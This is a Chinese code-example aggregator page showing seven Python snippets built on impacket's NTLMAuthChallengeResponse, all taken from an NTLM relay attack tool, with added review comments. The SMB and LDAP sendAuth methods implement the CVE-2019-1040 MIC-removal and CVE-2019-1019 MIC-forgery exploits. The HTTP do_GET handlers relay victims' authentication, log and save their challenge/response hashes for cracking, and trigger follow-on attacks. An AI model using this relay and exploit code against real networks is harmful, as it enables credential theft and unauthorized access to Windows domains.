本文整理汇总了Python中impacket.ntlm.NTLMAuthChallengeResponse方法的典型用法代码示例。如果您正苦于以下问题:Python ntlm.NTLMAuthChallengeResponse方法的具体用法?Python ntlm.NTLMAuthChallengeResponse怎么用?Python ntlm.NTLMAuthChallengeResponse使用的例子?那么这里精选的方法代码示例或许可以为您提供帮助。您也可以进一步了解该方法所在类impacket.ntlm的用法示例。
在下文中一共展示了ntlm.NTLMAuthChallengeResponse方法的7个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。
示例1: sendAuth
# 需要导入模块: from impacket import ntlm [as 别名]
# 或者: from impacket.ntlm import NTLMAuthChallengeResponse [as 别名]
def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
    """Forward a client's NTLM AUTHENTICATE message to the SMB target.

    The blob is parsed, optionally rewritten when ``serverConfig.remove_mic``
    is set, wrapped in an SPNEGO NegTokenResp unless its first byte already
    marks it as one, and passed to ``sendAuthv1`` or ``sendAuthv2`` according
    to the session dialect.

    :param authenticateMessageBlob: serialized AUTHENTICATE message (bytes).
    :param serverChallenge: passed through unchanged to the dialect sender.
    :return: ``(token, errorCode)`` exactly as the dialect sender returns them.
    """
    # NOTE(review): this listing lost its indentation; the nesting below is
    # reconstructed from the control flow -- confirm against the upstream file.
    # NOTE(review): the blob is parsed as raw NTLMSSP here, before the SPNEGO
    # check further down -- confirm what callers pass when it is already wrapped.
    authMessage = NTLMAuthChallengeResponse()
    authMessage.fromString(authenticateMessageBlob)
    # When exploiting CVE-2019-1040, remove flags
    if self.serverConfig.remove_mic:
        # Each flag is tested first, so the XOR only ever clears a bit that is set.
        if authMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
            authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
        if authMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
            authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
        if authMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
            authMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
        if authMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
            authMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
        # The integrity code and the Version field are emptied, then the
        # message is re-serialized without them.
        # NOTE(review): a server that validates the MIC should refuse a message
        # altered like this; presumably only hosts missing the CVE-2019-1040
        # fix accept it -- verify against the vendor advisory.
        authMessage['MIC'] = b''
        authMessage['MICLen'] = 0
        authMessage['Version'] = b''
        authMessage['VersionLen'] = 0
        authenticateMessageBlob = authMessage.getData()
    if unpack('B', authenticateMessageBlob[:1])[0] != SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
        # We need to wrap the NTLMSSP into SPNEGO
        respToken2 = SPNEGO_NegTokenResp()
        respToken2['ResponseToken'] = authenticateMessageBlob
        authData = respToken2.getData()
    else:
        authData = authenticateMessageBlob
    # The session dialect selects the SMB1 or the SMB2+ session-setup sender.
    if self.session.getDialect() == SMB_DIALECT:
        token, errorCode = self.sendAuthv1(authData, serverChallenge)
    else:
        token, errorCode = self.sendAuthv2(authData, serverChallenge)
    return token, errorCode
示例2: do_GET
# 需要导入模块: from impacket import ntlm [as 别名]
# 或者: from impacket.ntlm import NTLMAuthChallengeResponse [as 别名]
def do_GET(self):
    """Handle one HTTP GET of an NTLM-over-HTTP exchange on the relay listener.

    The ``Authorization`` header is split on ``'NTLM'`` and base64-decoded,
    and the message type is read as a little-endian 32-bit value right after
    the 8-byte ``NTLMSSP\\0`` signature. Type 1 goes to ``do_ntlm_negotiate``
    and type 3 to ``do_ntlm_auth``. On the wire this is a 401 /
    ``WWW-Authenticate: NTLM`` handshake that ends in a 404 with
    ``Connection: close`` once the forwarded authentication succeeded.

    :return: None; all output is written to the HTTP response.
    """
    # NOTE(review): this listing lost its indentation; the nesting below is
    # reconstructed from the control flow -- confirm against the upstream file.
    messageType = 0
    if self.server.config.mode == 'REDIRECT':
        self.do_SMBREDIRECT()
        return
    # NOTE(review): headers.getheader() looks like the Python 2 message API -- confirm.
    if self.headers.getheader('Authorization') is None:
        self.do_AUTHHEAD(message = 'NTLM')
        pass
    else:
        typeX = self.headers.getheader('Authorization')
        try:
            # The two-name unpack raises unless 'NTLM' occurs exactly once.
            _, blob = typeX.split('NTLM')
            token = base64.b64decode(blob.strip())
        except:
            self.do_AUTHHEAD()
        # NOTE(review): after a parse failure execution still reaches this line
        # with `token` unbound, and the bare except above also hides unrelated
        # errors; a return after do_AUTHHEAD() is probably intended.
        messageType = struct.unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
    if messageType == 1:
        if not self.do_ntlm_negotiate(token):
            #Connection failed
            self.server.config.target.log_target(self.client_address[0],self.target)
            self.do_REDIRECT()
    elif messageType == 3:
        authenticateMessage = ntlm.NTLMAuthChallengeResponse()
        authenticateMessage.fromString(token)
        # NOTE(review): "\%" in the two log format strings below is not a
        # recognised escape sequence; it only works because Python keeps the
        # backslash literally.
        if not self.do_ntlm_auth(token,authenticateMessage):
            logging.error("Authenticating against %s as %s\%s FAILED" % (self.target[1],authenticateMessage['domain_name'], authenticateMessage['user_name']))
            #Only skip to next if the login actually failed, not if it was just anonymous login or a system account which we don't want
            if authenticateMessage['user_name'] != '': # and authenticateMessage['user_name'][-1] != '$':
                self.server.config.target.log_target(self.client_address[0],self.target)
                #No anonymous login, go to next host and avoid triggering a popup
                self.do_REDIRECT()
            else:
                #If it was an anonymous login, send 401
                self.do_AUTHHEAD('NTLM')
        else:
            # Relay worked, do whatever we want here...
            logging.info("Authenticating against %s as %s\%s SUCCEED" % (self.target[1],authenticateMessage['domain_name'], authenticateMessage['user_name']))
            # Challenge, user, domain and both response fields go to the
            # formatter (presumably a John the Ripper hash line, going by its name).
            ntlm_hash_data = outputToJohnFormat( self.challengeMessage['challenge'], authenticateMessage['user_name'], authenticateMessage['domain_name'], authenticateMessage['lanman'], authenticateMessage['ntlm'] )
            # NOTE(review): the challenge/response string is logged at INFO, so
            # the log holds the same crackable material as the output file and
            # needs the same access control and retention handling.
            logging.info(ntlm_hash_data['hash_string'])
            if self.server.config.outputFile is not None:
                writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], self.server.config.outputFile)
            self.server.config.target.log_target(self.client_address[0],self.target)
            self.do_attack()
            # And answer 404 not found
            self.send_response(404)
            self.send_header('WWW-Authenticate', 'NTLM')
            self.send_header('Content-type', 'text/html')
            self.send_header('Content-Length','0')
            self.send_header('Connection','close')
            self.end_headers()
    return
示例3: do_GET
# 需要导入模块: from impacket import ntlm [as 别名]
# 或者: from impacket.ntlm import NTLMAuthChallengeResponse [as 别名]
def do_GET(self):
    """Handle one HTTP GET of an NTLM-over-HTTP exchange on the relay listener.

    The ``Authorization`` header is split on ``'NTLM'`` and base64-decoded,
    and the message type is read as a little-endian 32-bit value right after
    the 8-byte ``NTLMSSP\\0`` signature. Type 1 goes to ``do_ntlm_negotiate``
    and type 3 to ``do_ntlm_auth``. After a successful type 3 the stored
    challenge message is handed to ``do_attack`` and the client receives a
    404 with ``WWW-Authenticate: NTLM`` and ``Connection: close``.

    :return: None; all output is written to the HTTP response.
    """
    # NOTE(review): this listing lost its indentation; the nesting below is
    # reconstructed from the control flow -- confirm against the upstream file.
    messageType = 0
    if self.server.config.mode == 'REDIRECT':
        self.do_SMBREDIRECT()
        return
    # NOTE(review): headers.getheader() looks like the Python 2 message API -- confirm.
    if self.headers.getheader('Authorization') is None:
        self.do_AUTHHEAD(message = 'NTLM')
        pass
    else:
        typeX = self.headers.getheader('Authorization')
        try:
            # The two-name unpack raises unless 'NTLM' occurs exactly once.
            _, blob = typeX.split('NTLM')
            token = base64.b64decode(blob.strip())
        except:
            self.do_AUTHHEAD()
        # NOTE(review): after a parse failure execution still reaches this line
        # with `token` unbound, and the bare except above also hides unrelated
        # errors; a return after do_AUTHHEAD() is probably intended.
        messageType = struct.unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
    if messageType == 1:
        if not self.do_ntlm_negotiate(token):
            #Connection failed
            self.server.config.target.log_target(self.client_address[0],self.target)
            self.do_REDIRECT()
    elif messageType == 3:
        authenticateMessage = ntlm.NTLMAuthChallengeResponse()
        authenticateMessage.fromString(token)
        # NOTE(review): "\%" in the two log format strings below is not a
        # recognised escape sequence; it only works because Python keeps the
        # backslash literally.
        if not self.do_ntlm_auth(token,authenticateMessage):
            logging.error("Authenticating against %s as %s\%s FAILED" % (
                self.target[1], authenticateMessage['domain_name'], authenticateMessage['user_name']))
            #Only skip to next if the login actually failed, not if it was just anonymous login or a system account which we don't want
            if authenticateMessage['user_name'] != '': # and authenticateMessage['user_name'][-1] != '$':
                self.server.config.target.log_target(self.client_address[0],self.target)
                #No anonymous login, go to next host and avoid triggering a popup
                self.do_REDIRECT()
            else:
                #If it was an anonymous login, send 401
                self.do_AUTHHEAD('NTLM')
        else:
            # Relay worked, do whatever we want here...
            logging.info("Authenticating against %s as %s\%s SUCCEED" % (
                self.target[1], authenticateMessage['domain_name'], authenticateMessage['user_name']))
            # Challenge, user, domain and both response fields go to the
            # formatter (presumably a John the Ripper hash line, going by its name).
            ntlm_hash_data = outputToJohnFormat(self.challengeMessage['challenge'],
                                                authenticateMessage['user_name'],
                                                authenticateMessage['domain_name'],
                                                authenticateMessage['lanman'], authenticateMessage['ntlm'])
            # NOTE(review): the challenge/response string is logged at INFO, so
            # the log holds the same crackable material as the output file and
            # needs the same access control and retention handling.
            logging.info(ntlm_hash_data['hash_string'])
            if self.server.config.outputFile is not None:
                writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], self.server.config.outputFile)
            self.server.config.target.log_target(self.client_address[0],self.target)
            # Unlike a bare do_attack() call, this one receives the stored challenge message.
            self.do_attack( {'CHALLENGE_MESSAGE': self.challengeMessage} )
            # And answer 404 not found
            self.send_response(404)
            self.send_header('WWW-Authenticate', 'NTLM')
            self.send_header('Content-type', 'text/html')
            self.send_header('Content-Length','0')
            self.send_header('Connection','close')
            self.end_headers()
    return
示例4: sendAuth
# 需要导入模块: from impacket import ntlm [as 别名]
# 或者: from impacket.ntlm import NTLMAuthChallengeResponse [as 别名]
def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
    """Forward a client's NTLM AUTHENTICATE message to the SMB target.

    The blob is parsed, optionally rewritten when ``serverConfig.remove_mic``
    is set, wrapped in SPNEGO if needed, and, when
    ``serverConfig.remove_target`` is set, given a recomputed MIC from a key
    returned by ``netlogonSessionKey``. It is then passed to ``sendAuthv1``
    or ``sendAuthv2`` according to the session dialect.

    :param authenticateMessageBlob: serialized AUTHENTICATE message (bytes).
    :param serverChallenge: passed through unchanged to the dialect sender.
    :return: ``(token, errorCode)`` exactly as the dialect sender returns them.
    """
    # NOTE(review): this listing lost its indentation; the nesting below is
    # reconstructed from the control flow -- confirm against the upstream file.
    # NOTE(review): the blob is parsed as raw NTLMSSP here, before the SPNEGO
    # check further down -- confirm what callers pass when it is already wrapped.
    authMessage = NTLMAuthChallengeResponse()
    authMessage.fromString(authenticateMessageBlob)
    # When exploiting CVE-2019-1040, remove flags
    if self.serverConfig.remove_mic:
        # Each flag is tested first, so the XOR only ever clears a bit that is set.
        if authMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
            authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
        if authMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
            authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
        if authMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
            authMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
        if authMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
            authMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
        # NOTE(review): a server that validates the MIC should refuse a message
        # altered like this; presumably only hosts missing the CVE-2019-1040
        # fix accept it -- verify against the vendor advisory.
        authMessage['MIC'] = b''
        authMessage['MICLen'] = 0
        authMessage['Version'] = b''
        authMessage['VersionLen'] = 0
        authenticateMessageBlob = authMessage.getData()
    if unpack('B', authenticateMessageBlob[:1])[0] != SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
        # We need to wrap the NTLMSSP into SPNEGO
        respToken2 = SPNEGO_NegTokenResp()
        respToken2['ResponseToken'] = authenticateMessageBlob
        authData = respToken2.getData()
    else:
        authData = authenticateMessageBlob
    signingKey = None
    if self.serverConfig.remove_target:
        # Trying to exploit CVE-2019-1019
        # Discovery and Implementation by @simakov_marina and @YaronZi
        respToken2 = SPNEGO_NegTokenResp(authData)
        authenticateMessageBlob = respToken2['ResponseToken']
        # NOTE(review): this errorCode is never checked and is overwritten by
        # the sender below; signingKey is fed to hmac_md5 whatever the outcome.
        errorCode, signingKey = self.netlogonSessionKey(authData)
        # Recalculate MIC
        # NOTE(review): `res` is parsed but not referenced again in this method.
        res = NTLMAuthChallengeResponse()
        res.fromString(authenticateMessageBlob)
        # The 16 bytes at 0x48..0x58 are zeroed for the HMAC input and then
        # replaced by the result.
        # NOTE(review): the fixed offsets presumably assume the Version field
        # is present; remove_mic above empties it -- confirm both options are
        # never set together.
        newAuthBlob = authenticateMessageBlob[0:0x48] + b'\x00'*16 + authenticateMessageBlob[0x58:]
        relay_MIC = hmac_md5(signingKey, self.negotiateMessage + self.challengeMessage + newAuthBlob)
        respToken2 = SPNEGO_NegTokenResp()
        respToken2['ResponseToken'] = authenticateMessageBlob[0:0x48] + relay_MIC + authenticateMessageBlob[0x58:]
        authData = respToken2.getData()
    # The session dialect selects the SMB1 or the SMB2+ session-setup sender.
    if self.session.getDialect() == SMB_DIALECT:
        token, errorCode = self.sendAuthv1(authData, serverChallenge)
    else:
        token, errorCode = self.sendAuthv2(authData, serverChallenge)
    if signingKey:
        # The key is installed through a private attribute of the session
        # object, without looking at errorCode first.
        logging.info("Enabling session signing")
        self.session._SMBConnection.set_session_key(signingKey)
    return token, errorCode
示例5: do_GET
# 需要导入模块: from impacket import ntlm [as 别名]
# 或者: from impacket.ntlm import NTLMAuthChallengeResponse [as 别名]
def do_GET(self):
    """Handle one HTTP GET of an NTLM-over-HTTP exchange on the relay listener.

    The ``Authorization`` header is split on ``'NTLM'`` and base64-decoded,
    and the message type is read as a little-endian 32-bit value right after
    the 8-byte ``NTLMSSP\\0`` signature. Type 1 goes to ``do_ntlm_negotiate``
    and type 3 to ``do_ntlm_auth``. On the wire this is a 401 /
    ``WWW-Authenticate: NTLM`` handshake that ends in a 404 with
    ``Connection: close`` once the forwarded authentication succeeded.

    :return: None; all output is written to the HTTP response.
    """
    # NOTE(review): this listing lost its indentation; the nesting below is
    # reconstructed from the control flow -- confirm against the upstream file.
    messageType = 0
    # NOTE(review): headers.getheader() looks like the Python 2 message API -- confirm.
    if self.headers.getheader('Authorization') is None:
        self.do_AUTHHEAD(message = 'NTLM')
        pass
    else:
        typeX = self.headers.getheader('Authorization')
        try:
            # The two-name unpack raises unless 'NTLM' occurs exactly once.
            _, blob = typeX.split('NTLM')
            token = base64.b64decode(blob.strip())
        except:
            self.do_AUTHHEAD()
        # NOTE(review): after a parse failure execution still reaches this line
        # with `token` unbound, and the bare except above also hides unrelated
        # errors; a return after do_AUTHHEAD() is probably intended.
        messageType = struct.unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
    if messageType == 1:
        if not self.do_ntlm_negotiate(token):
            #Connection failed
            self.server.config.target.log_target(self.client_address[0],self.target)
            self.do_REDIRECT()
    elif messageType == 3:
        authenticateMessage = ntlm.NTLMAuthChallengeResponse()
        authenticateMessage.fromString(token)
        # NOTE(review): "\%" in the two log format strings below is not a
        # recognised escape sequence; it only works because Python keeps the
        # backslash literally.
        if not self.do_ntlm_auth(token,authenticateMessage):
            logging.error("Authenticating against %s as %s\%s FAILED" % (self.target[1],authenticateMessage['domain_name'], authenticateMessage['user_name']))
            #Only skip to next if the login actually failed, not if it was just anonymous login or a system account which we don't want
            if authenticateMessage['user_name'] != '': # and authenticateMessage['user_name'][-1] != '$':
                self.server.config.target.log_target(self.client_address[0],self.target)
                #No anonymous login, go to next host and avoid triggering a popup
                self.do_REDIRECT()
            else:
                #If it was an anonymous login, send 401
                self.do_AUTHHEAD('NTLM')
        else:
            # Relay worked, do whatever we want here...
            logging.info("Authenticating against %s as %s\%s SUCCEED" % (self.target[1],authenticateMessage['domain_name'], authenticateMessage['user_name']))
            # Challenge, user, domain and both response fields go to the
            # formatter (presumably a John the Ripper hash line, going by its name).
            ntlm_hash_data = outputToJohnFormat( self.challengeMessage['challenge'], authenticateMessage['user_name'], authenticateMessage['domain_name'], authenticateMessage['lanman'], authenticateMessage['ntlm'] )
            # NOTE(review): the challenge/response string is logged at INFO, so
            # the log holds the same crackable material as the output file and
            # needs the same access control and retention handling.
            logging.info(ntlm_hash_data['hash_string'])
            if self.server.config.outputFile is not None:
                writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], self.server.config.outputFile)
            self.server.config.target.log_target(self.client_address[0],self.target)
            self.do_attack()
            # And answer 404 not found
            self.send_response(404)
            self.send_header('WWW-Authenticate', 'NTLM')
            self.send_header('Content-type', 'text/html')
            self.send_header('Content-Length','0')
            self.send_header('Connection','close')
            self.end_headers()
    return
示例6: sendAuth
# 需要导入模块: from impacket import ntlm [as 别名]
# 或者: from impacket.ntlm import NTLMAuthChallengeResponse [as 别名]
def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
    """Forward a client's NTLM AUTHENTICATE message to the target in an LDAP bind.

    The NTLMSSP token is taken out of its SPNEGO wrapper when the first byte
    marks one, optionally rewritten when ``serverConfig.remove_mic`` is set,
    and sent as a ``SICILY_RESPONSE_NTLM`` bind request under the session's
    connection lock.

    :param authenticateMessageBlob: AUTHENTICATE message, raw or SPNEGO-wrapped.
    :param serverChallenge: accepted for interface parity; not used in this method.
    :return: ``(None, STATUS_SUCCESS)`` when the bind result is RESULT_SUCCESS,
        otherwise ``(None, STATUS_ACCESS_DENIED)``.
    :raises LDAPRelayClientException: when the result is
        RESULT_STRONGER_AUTH_REQUIRED and the plugin is not 'LDAPS'.
    """
    # NOTE(review): this listing lost its indentation; the nesting below is
    # reconstructed from the control flow -- confirm against the upstream file.
    if unpack('B', authenticateMessageBlob[:1])[0] == SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
        respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
        token = respToken2['ResponseToken']
    else:
        token = authenticateMessageBlob
    authMessage = NTLMAuthChallengeResponse()
    authMessage.fromString(token)
    # When exploiting CVE-2019-1040, remove flags
    if self.serverConfig.remove_mic:
        # Each flag is tested first, so the XOR only ever clears a bit that is set.
        if authMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
            authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
        if authMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
            authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
        if authMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
            authMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
        if authMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
            authMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
        # NOTE(review): a server that validates the MIC should refuse a message
        # altered like this; presumably only hosts missing the CVE-2019-1040
        # fix accept it -- verify against the vendor advisory.
        authMessage['MIC'] = b''
        authMessage['MICLen'] = 0
        authMessage['Version'] = b''
        authMessage['VersionLen'] = 0
        token = authMessage.getData()
    with self.session.connection_lock:
        # The token is stored on self before the request is built; bind_operation
        # receives self, so it presumably reads the token back from there -- confirm.
        self.authenticateMessageBlob = token
        request = bind.bind_operation(self.session.version, 'SICILY_RESPONSE_NTLM', self, None)
        response = self.session.post_send_single_response(self.session.send('bindRequest', request, None))
        result = response[0]
    self.session.sasl_in_progress = False
    if result['result'] == RESULT_SUCCESS:
        self.session.bound = True
        self.session.refresh_server_info()
        return None, STATUS_SUCCESS
    else:
        # A server that enforces LDAP signing answers a plain-LDAP bind with
        # RESULT_STRONGER_AUTH_REQUIRED, which is raised instead of returned.
        # NOTE(review): over LDAPS this branch is skipped; channel binding on
        # the server is presumably the matching control there -- confirm.
        if result['result'] == RESULT_STRONGER_AUTH_REQUIRED and self.PLUGIN_NAME != 'LDAPS':
            raise LDAPRelayClientException('Server rejected authentication because LDAP signing is enabled. Try connecting with TLS enabled (specify target as ldaps://hostname )')
    return None, STATUS_ACCESS_DENIED
#This is a fake function for ldap3 which wants an NTLM client with specific methods
示例7: sendAuth
# 需要导入模块: from impacket import ntlm [as 别名]
# 或者: from impacket.ntlm import NTLMAuthChallengeResponse [as 别名]
def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
    """Forward a client's NTLM AUTHENTICATE message to the SMB target.

    The blob is parsed, optionally rewritten when ``serverConfig.remove_mic``
    is set, wrapped in SPNEGO if needed, and, when
    ``serverConfig.remove_target`` is set, given a recomputed MIC from a key
    returned by ``netlogonSessionKey``. It is then passed to ``sendAuthv1``
    or ``sendAuthv2`` according to the session dialect.

    :param authenticateMessageBlob: serialized AUTHENTICATE message (bytes).
    :param serverChallenge: passed through unchanged to the dialect sender.
    :return: ``(token, errorCode)`` exactly as the dialect sender returns them.
    """
    # NOTE(review): this listing lost its indentation; the nesting below is
    # reconstructed from the control flow -- confirm against the upstream file.
    # NOTE(review): the blob is parsed as raw NTLMSSP here, before the SPNEGO
    # check further down -- confirm what callers pass when it is already wrapped.
    authMessage = NTLMAuthChallengeResponse()
    authMessage.fromString(authenticateMessageBlob)
    # When exploiting CVE-2019-1040, remove flags
    if self.serverConfig.remove_mic:
        # Each flag is tested first, so the XOR only ever clears a bit that is set.
        if authMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
            authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
        if authMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
            authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
        if authMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
            authMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
        if authMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
            authMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
        # NOTE(review): a server that validates the MIC should refuse a message
        # altered like this; presumably only hosts missing the CVE-2019-1040
        # fix accept it -- verify against the vendor advisory.
        authMessage['MIC'] = b''
        authMessage['MICLen'] = 0
        authMessage['Version'] = b''
        authMessage['VersionLen'] = 0
        authenticateMessageBlob = authMessage.getData()
    if unpack('B', authenticateMessageBlob[:1])[0] != SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
        # We need to wrap the NTLMSSP into SPNEGO
        respToken2 = SPNEGO_NegTokenResp()
        respToken2['ResponseToken'] = authenticateMessageBlob
        authData = respToken2.getData()
    else:
        authData = authenticateMessageBlob
    signingKey = None
    if self.serverConfig.remove_target:
        # Trying to exploit CVE-2019-1019
        # Discovery and Implementation by @simakov_marina
        respToken2 = SPNEGO_NegTokenResp(authData)
        authenticateMessageBlob = respToken2['ResponseToken']
        # NOTE(review): this errorCode is never checked and is overwritten by
        # the sender below; signingKey is fed to hmac_md5 whatever the outcome.
        errorCode, signingKey = self.netlogonSessionKey(authData)
        # Recalculate MIC
        # NOTE(review): `res` is parsed but not referenced again in this method.
        res = NTLMAuthChallengeResponse()
        res.fromString(authenticateMessageBlob)
        # The 16 bytes at 0x48..0x58 are zeroed for the HMAC input and then
        # replaced by the result.
        # NOTE(review): the fixed offsets presumably assume the Version field
        # is present; remove_mic above empties it -- confirm both options are
        # never set together.
        newAuthBlob = authenticateMessageBlob[0:0x48] + b'\x00'*16 + authenticateMessageBlob[0x58:]
        relay_MIC = hmac_md5(signingKey, self.negotiateMessage + self.challengeMessage + newAuthBlob)
        respToken2 = SPNEGO_NegTokenResp()
        respToken2['ResponseToken'] = authenticateMessageBlob[0:0x48] + relay_MIC + authenticateMessageBlob[0x58:]
        authData = respToken2.getData()
    # The session dialect selects the SMB1 or the SMB2+ session-setup sender.
    if self.session.getDialect() == SMB_DIALECT:
        token, errorCode = self.sendAuthv1(authData, serverChallenge)
    else:
        token, errorCode = self.sendAuthv2(authData, serverChallenge)
    if signingKey:
        # The key is installed through a private attribute of the session
        # object, without looking at errorCode first.
        logging.info("Enabling session signing")
        self.session._SMBConnection.set_session_key(signingKey)
    return token, errorCode